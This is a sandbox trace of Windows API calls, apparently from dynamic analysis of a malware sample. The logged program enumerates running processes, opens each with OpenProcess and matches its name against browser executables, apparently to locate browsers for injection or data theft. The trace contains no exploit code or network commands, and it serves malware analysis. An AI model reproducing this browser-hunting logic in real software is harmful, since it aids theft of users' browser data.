	[0209.871] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0209.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x353c
	[0209.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.872] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.872] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.872] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.873] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.873] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0209.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3540
	[0209.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.874] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0209.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.874] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.874] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0209.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.875] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.875] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0209.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3544
	[0209.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.876] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0209.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.876] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.876] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0209.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.877] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.877] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0209.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3548
	[0209.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.878] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0209.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.878] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.878] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0209.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.878] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0209.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x354c
	[0209.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.879] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0209.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.880] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.880] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0209.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.880] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.880] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3550
	[0209.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.881] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.881] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.882] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.882] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.882] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.883] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3554
	[0209.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.883] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.884] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.884] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.884] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.884] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3558
	[0209.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.885] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.886] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.886] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.886] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.886] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x355c
	[0209.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.887] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.888] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.888] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.888] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.888] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3560
	[0209.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.889] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.889] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.890] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.890] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.890] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3564
	[0209.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.891] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.891] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.892] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.892] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.892] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.893] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3568
	[0209.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.893] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.893] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.894] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.894] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.894] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0209.895] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x356c
	[0209.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.895] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0209.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.895] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.895] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0209.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.896] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.896] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.897] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3570
	[0209.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.897] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.897] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.898] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.898] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.898] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0209.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3574
	[0209.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.900] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.900] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.901] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.901] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.901] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3578
	[0209.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.902] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.903] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.903] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.903] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.904] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x357c
	[0209.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.905] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.905] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.906] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.906] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.906] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0209.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3580
	[0209.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.907] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0209.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.907] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.907] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0209.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.908] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.908] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0209.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3584
	[0209.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.909] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0209.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.909] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.910] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0209.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.910] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.910] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0209.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3588
	[0209.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.911] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0209.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.912] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.912] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0209.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.912] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.913] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0209.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x358c
	[0209.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.914] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0209.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.915] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.915] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0209.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.915] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.916] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0209.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0209.916] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0209.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3590
	[0209.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.918] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0209.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.918] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.919] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0209.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.920] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.920] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0209.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3594
	[0209.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.921] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0209.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.922] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.922] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0209.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.922] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.923] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0209.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3598
	[0209.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.924] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0209.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.924] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.924] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0209.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.925] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.925] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0209.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x359c
	[0209.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.926] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0209.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
